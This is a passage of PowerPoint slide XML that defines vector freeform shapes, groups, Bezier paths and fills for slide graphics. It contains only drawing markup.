                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119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72549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40" name="Freeform 855">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6153616B-36ED-4C2F-8BB9-8C822E6C0AC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52" y="1304"/>
                  <a:ext cx="109" cy="69"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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41" name="Oval 856">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE7C4F6-F7CB-4955-AB9D-4A252C5B75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flipH="1">
                  <a:off x="2239" y="1204"/>
                  <a:ext cx="145" cy="145"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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84" name="Group 1880">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0D060A-E8E3-4A06-8FC5-5688FFB62CF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325667" y="1884363"/>
              <a:ext cx="282575" cy="625475"/>
              <a:chOff x="1547" y="1722"/>
              <a:chExt cx="434" cy="962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2229" name="Freeform 1881">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92098291-7011-4D32-966C-DBD76F991B1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74" y="1758"/>
                <a:ext cx="381" cy="920"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 794"/>
                  <a:gd name="T1" fmla="*/ 213 h 1916"/>
                  <a:gd name="T2" fmla="*/ 0 w 794"/>
                  <a:gd name="T3" fmla="*/ 1916 h 1916"/>
                  <a:gd name="T4" fmla="*/ 794 w 794"/>
                  <a:gd name="T5" fmla="*/ 1703 h 1916"/>
                  <a:gd name="T6" fmla="*/ 794 w 794"/>
                  <a:gd name="T7" fmla="*/ 0 h 1916"/>
                  <a:gd name="T8" fmla="*/ 0 w 794"/>
                  <a:gd name="T9" fmla="*/ 213 h 19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4" h="1916">
                    <a:moveTo>
                      <a:pt x="0" y="213"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="794" y="1703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="794" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="213"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="B6B6B6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30" name="Freeform 1882">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF58674F-EB75-4729-9716-73CC667E87A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12" y="2228"/>
                <a:ext cx="27" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                  <a:gd name="T1" fmla="*/ 0 h 73"/>
                  <a:gd name="T2" fmla="*/ 0 w 57"/>
                  <a:gd name="T3" fmla="*/ 14 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 57"/>
                  <a:gd name="T5" fmla="*/ 73 h 73"/>
                  <a:gd name="T6" fmla="*/ 26 w 57"/>
                  <a:gd name="T7" fmla="*/ 66 h 73"/>
                  <a:gd name="T8" fmla="*/ 26 w 57"/>
                  <a:gd name="T9" fmla="*/ 26 h 73"/>
                  <a:gd name="T10" fmla="*/ 57 w 57"/>
                  <a:gd name="T11" fmla="*/ 19 h 73"/>
                  <a:gd name="T12" fmla="*/ 57 w 57"/>
                  <a:gd name="T1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73">
                    <a:moveTo>
                      <a:pt x="57" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="19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0A0A0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31" name="Freeform 1883">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E4DDEB-9F9B-4C3C-BBD6-096F98700BB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47" y="1841"/>
                <a:ext cx="27" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 57"/>
                  <a:gd name="T1" fmla="*/ 0 h 1755"/>
                  <a:gd name="T2" fmla="*/ 0 w 57"/>
                  <a:gd name="T3" fmla="*/ 817 h 1755"/>
                  <a:gd name="T4" fmla="*/ 0 w 57"/>
                  <a:gd name="T5" fmla="*/ 817 h 1755"/>
                  <a:gd name="T6" fmla="*/ 0 w 57"/>
                  <a:gd name="T7" fmla="*/ 817 h 1755"/>
                  <a:gd name="T8" fmla="*/ 0 w 57"/>
                  <a:gd name="T9" fmla="*/ 1285 h 1755"/>
                  <a:gd name="T10" fmla="*/ 0 w 57"/>
                  <a:gd name="T11" fmla="*/ 1285 h 1755"/>
                  <a:gd name="T12" fmla="*/ 0 w 57"/>
                  <a:gd name="T13" fmla="*/ 1285 h 1755"/>
                  <a:gd name="T14" fmla="*/ 0 w 57"/>
                  <a:gd name="T15" fmla="*/ 1755 h 1755"/>
                  <a:gd name="T16" fmla="*/ 57 w 57"/>
                  <a:gd name="T17" fmla="*/ 1738 h 1755"/>
                  <a:gd name="T18" fmla="*/ 57 w 57"/>
                  <a:gd name="T19" fmla="*/ 47 h 1755"/>
                  <a:gd name="T20" fmla="*/ 0 w 57"/>
                  <a:gd name="T21" fmla="*/ 0 h 1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7" h="1755">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1738"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="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32" name="Freeform 1884">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E49525E-BCB9-4089-B501-91E88DBCA89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47" y="1723"/>
                <a:ext cx="434" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 851 w 905"/>
                  <a:gd name="T1" fmla="*/ 14 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 905"/>
                  <a:gd name="T3" fmla="*/ 241 h 288"/>
                  <a:gd name="T4" fmla="*/ 57 w 905"/>
                  <a:gd name="T5" fmla="*/ 288 h 288"/>
                  <a:gd name="T6" fmla="*/ 851 w 905"/>
                  <a:gd name="T7" fmla="*/ 76 h 288"/>
                  <a:gd name="T8" fmla="*/ 905 w 905"/>
                  <a:gd name="T9" fmla="*/ 0 h 288"/>
                  <a:gd name="T10" fmla="*/ 851 w 905"/>
                  <a:gd name="T11" fmla="*/ 14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05" h="288">
                    <a:moveTo>
                      <a:pt x="851" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="14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33" name="Freeform 1885">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6826B294-6716-46CC-8107-CE073D9B69C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955" y="1722"/>
                <a:ext cx="26" cy="852"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 54"/>
                  <a:gd name="T1" fmla="*/ 75 h 1774"/>
                  <a:gd name="T2" fmla="*/ 0 w 54"/>
                  <a:gd name="T3" fmla="*/ 838 h 1774"/>
                  <a:gd name="T4" fmla="*/ 0 w 54"/>
                  <a:gd name="T5" fmla="*/ 838 h 1774"/>
                  <a:gd name="T6" fmla="*/ 0 w 54"/>
                  <a:gd name="T7" fmla="*/ 838 h 1774"/>
                  <a:gd name="T8" fmla="*/ 0 w 54"/>
                  <a:gd name="T9" fmla="*/ 1306 h 1774"/>
                  <a:gd name="T10" fmla="*/ 0 w 54"/>
                  <a:gd name="T11" fmla="*/ 1306 h 1774"/>
                  <a:gd name="T12" fmla="*/ 0 w 54"/>
                  <a:gd name="T13" fmla="*/ 1306 h 1774"/>
                  <a:gd name="T14" fmla="*/ 0 w 54"/>
                  <a:gd name="T15" fmla="*/ 1774 h 1774"/>
                  <a:gd name="T16" fmla="*/ 54 w 54"/>
                  <a:gd name="T17" fmla="*/ 1760 h 1774"/>
                  <a:gd name="T18" fmla="*/ 54 w 54"/>
                  <a:gd name="T19" fmla="*/ 0 h 1774"/>
                  <a:gd name="T20" fmla="*/ 0 w 54"/>
                  <a:gd name="T21" fmla="*/ 75 h 1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1774">
                    <a:moveTo>
                      <a:pt x="0" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="0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085" name="Group 828">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6982FFD7-0CDD-4DBE-A968-C92F55D968E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517567" y="2220835"/>
              <a:ext cx="481013" cy="388938"/>
              <a:chOff x="2154" y="1819"/>
              <a:chExt cx="217" cy="176"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2201" name="Group 829">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16382482-5994-4C48-BCBD-C4638A7CA6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54" y="1862"/>
                <a:ext cx="217" cy="133"/>
                <a:chOff x="1977" y="2705"/>
                <a:chExt cx="897" cy="548"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2217" name="Freeform 830">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E21449-7621-464D-BD25-DE6745EFFB7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977" y="2787"/>
                  <a:ext cx="45" cy="321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3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3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18" name="Freeform 831">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD638B41-0287-4FB7-A565-76A98CD8797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022" y="2787"/>
                  <a:ext cx="46" cy="321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3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3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19" name="Freeform 832">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E8EFA31-EDD6-4B04-A3C5-E60503B80D6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74" y="2932"/>
                  <a:ext cx="45" cy="321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20" name="Freeform 833">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39226A5D-9B1A-4814-B2A6-3AA0646D8FC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29" y="2932"/>
                  <a:ext cx="45" cy="321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21" name="Freeform 834">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C2B805-BE23-4E96-B38C-8A0CAA5BB66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29" y="2866"/>
                  <a:ext cx="45" cy="321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22" name="Freeform 835">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32A53D8-B8D0-42A8-B990-46C85AB8B1D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2866"/>
                  <a:ext cx="49" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 13"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 0 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 13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87">
                      <a:moveTo>
                        <a:pt x="13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3" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13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23" name="Freeform 836">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACFB3EA-85E5-480C-8EF5-D671E636913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77" y="2705"/>
                  <a:ext cx="45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24" name="Freeform 837">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5634850-4F76-4A66-85B5-7AC824487B4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77" y="2717"/>
                  <a:ext cx="45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25" name="Freeform 838">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4C7CCD-2931-4621-BCFC-1F3390C5CEF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35" y="2717"/>
                  <a:ext cx="42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4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26" name="Freeform 839">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E33B5-21BF-415C-B022-379670B191A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977" y="2787"/>
                  <a:ext cx="597" cy="206"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 161 w 161"/>
                    <a:gd name="T1" fmla="*/ 43 h 56"/>
                    <a:gd name="T2" fmla="*/ 161 w 161"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 161"/>
                    <a:gd name="T5" fmla="*/ 12 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 161"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 161 w 161"/>
                    <a:gd name="T9" fmla="*/ 43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1" h="56">
                      <a:moveTo>
                        <a:pt x="161" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="56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61" y="43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27" name="Freeform 840">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937B1B79-7AC4-47EB-8FA5-7D01D168436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74" y="2866"/>
                  <a:ext cx="300" cy="127"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 81 w 81"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 81 w 81"/>
                    <a:gd name="T3" fmla="*/ 13 h 35"/>
                    <a:gd name="T4" fmla="*/ 0 w 81"/>
                    <a:gd name="T5" fmla="*/ 35 h 35"/>
                    <a:gd name="T6" fmla="*/ 0 w 81"/>
                    <a:gd name="T7" fmla="*/ 22 h 35"/>
                    <a:gd name="T8" fmla="*/ 81 w 8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35">
                      <a:moveTo>
                        <a:pt x="81" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="81" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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28" name="Freeform 841">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C05187-24AC-4A22-BE40-3C3DCED29CA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977" y="2705"/>
                  <a:ext cx="897" cy="240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 242"/>
                    <a:gd name="T1" fmla="*/ 43 h 65"/>
                    <a:gd name="T2" fmla="*/ 161 w 242"/>
                    <a:gd name="T3" fmla="*/ 22 h 65"/>
                    <a:gd name="T4" fmla="*/ 161 w 242"/>
                    <a:gd name="T5" fmla="*/ 22 h 65"/>
                    <a:gd name="T6" fmla="*/ 81 w 242"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 242"/>
                    <a:gd name="T9" fmla="*/ 22 h 65"/>
                    <a:gd name="T10" fmla="*/ 81 w 242"/>
